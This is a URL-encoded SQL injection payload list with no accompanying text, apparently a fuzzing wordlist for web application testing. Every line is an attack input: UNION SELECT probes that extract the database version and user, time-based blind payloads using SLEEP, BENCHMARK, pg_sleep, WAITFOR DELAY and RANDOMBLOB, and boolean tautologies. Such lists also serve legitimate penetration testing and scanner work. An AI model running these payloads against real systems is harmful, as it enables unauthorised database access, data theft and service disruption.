%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%23
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%23
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%23
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%23
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%23
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%23
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%23
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%23
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%23
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%23
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%23
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%23
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%23
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%23
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%23
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%23
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%23
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%23
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%23
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%23
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%23
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%23
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%23
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%23
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%23
%20UNION%20ALL%20SELECT%20USER%28%29--%20
%20UNION%20ALL%20SELECT%20SLEEP%285%29--%20
%20UNION%20ALL%20SELECT%20USER%28%29%2CSLEEP%285%29--%20
%20UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29--%20
%20UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29--%20
%20UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL--%20
%20UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL--%20
%20UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL--%20
%20UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL--%20
%20UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20
%20UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20
%20UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20
%20UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20
%20UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20
%20UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20
%20UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20
%20UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20
%20UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20
%20UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20
%20UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20
%20UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20
%20UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20
%20UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20
%20UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20
%20UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20
%20UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20
%20UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20
%20UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20
%20UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20
%20UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20
%20UNION%20ALL%20SELECT%20NULL--%20
sleep%285%29%23
1%20or%20sleep%285%29%23
%22%20or%20sleep%285%29%23
%27%20or%20sleep%285%29%23
%22%20or%20sleep%285%29%3D%22
%27%20or%20sleep%285%29%3D%27
1%29%20or%20sleep%285%29%23
%22%29%20or%20sleep%285%29%3D%22
%27%29%20or%20sleep%285%29%3D%27
1%29%29%20or%20sleep%285%29%23
%22%29%29%20or%20sleep%285%29%3D%22
%27%29%29%20or%20sleep%285%29%3D%27
%3Bwaitfor%20delay%20%270%3A0%3A5%27--
%29%3Bwaitfor%20delay%20%270%3A0%3A5%27--
%27%3Bwaitfor%20delay%20%270%3A0%3A5%27--
%22%3Bwaitfor%20delay%20%270%3A0%3A5%27--
%27%29%3Bwaitfor%20delay%20%270%3A0%3A5%27--
%22%29%3Bwaitfor%20delay%20%270%3A0%3A5%27--
%29%29%3Bwaitfor%20delay%20%270%3A0%3A5%27--
%27%29%29%3Bwaitfor%20delay%20%270%3A0%3A5%27--
%22%29%29%3Bwaitfor%20delay%20%270%3A0%3A5%27--
benchmark%2810000000%2CMD5%281%29%29%23
1%20or%20benchmark%2810000000%2CMD5%281%29%29%23
%22%20or%20benchmark%2810000000%2CMD5%281%29%29%23
%27%20or%20benchmark%2810000000%2CMD5%281%29%29%23
1%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
%22%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
%27%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
1%29%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
%22%29%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
%27%29%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
pg_sleep%285%29--
1%20or%20pg_sleep%285%29--
%22%20or%20pg_sleep%285%29--
%27%20or%20pg_sleep%285%29--
1%29%20or%20pg_sleep%285%29--
%22%29%20or%20pg_sleep%285%29--
%27%29%20or%20pg_sleep%285%29--
1%29%29%20or%20pg_sleep%285%29--
%22%29%29%20or%20pg_sleep%285%29--
%27%29%29%20or%20pg_sleep%285%29--
AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29bAKL%29%20AND%20%27vRxe%27%3D%27vRxe
AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29YjoC%29%20AND%20%27%25%27%3D%27
AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nQIP%29
AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nQIP%29--
AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nQIP%29%23
SLEEP%285%29%23
SLEEP%285%29--
SLEEP%285%29%3D%22
SLEEP%285%29%3D%27
or%20SLEEP%285%29
or%20SLEEP%285%29%23
or%20SLEEP%285%29--
or%20SLEEP%285%29%3D%22
or%20SLEEP%285%29%3D%27
waitfor%20delay%20%2700%3A00%3A05%27
waitfor%20delay%20%2700%3A00%3A05%27--
waitfor%20delay%20%2700%3A00%3A05%27%23
benchmark%2850000000%2CMD5%281%29%29
benchmark%2850000000%2CMD5%281%29%29--
benchmark%2850000000%2CMD5%281%29%29%23
or%20benchmark%2850000000%2CMD5%281%29%29
or%20benchmark%2850000000%2CMD5%281%29%29--
or%20benchmark%2850000000%2CMD5%281%29%29%23
pg_SLEEP%285%29
pg_SLEEP%285%29--
pg_SLEEP%285%29%23
or%20pg_SLEEP%285%29
or%20pg_SLEEP%285%29--
or%20pg_SLEEP%285%29%23
%27%5C%22
AnD%20SLEEP%285%29
AnD%20SLEEP%285%29--
AnD%20SLEEP%285%29%23
%26%26SLEEP%285%29
%26%26SLEEP%285%29--
%26%26SLEEP%285%29%23
%27%20AnD%20SLEEP%285%29%20ANd%20%271
%27%26%26SLEEP%285%29%26%26%271
ORDER%20BY%20SLEEP%285%29
ORDER%20BY%20SLEEP%285%29--
ORDER%20BY%20SLEEP%285%29%23
%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ecMj%29
%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ecMj%29%23
%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ecMj%29--
%2Bbenchmark%283200%2CSHA1%281%29%29%2B%27
%2B%20SLEEP%2810%29%20%2B%20%27
RANDOMBLOB%28500000000%2F2%29
AND%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29
OR%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29
RANDOMBLOB%281000000000%2F2%29
AND%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%281000000000%2F2%29%29%29%29
OR%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%281000000000%2F2%29%29%29%29
SLEEP%281%29%2F%2A%27%20or%20SLEEP%281%29%20or%20%27%22%20or%20SLEEP%281%29%20or%20%22%2A%2F
1%271
1%20exec%20sp_%20%28or%20exec%20xp_%29
1%20and%201%3D1
1%27%20and%201%3D%28select%20count%28%2A%29%20from%20tablenames%29%3B%20--
1%20or%201%3D1
1%27%20or%20%271%27%3D%271
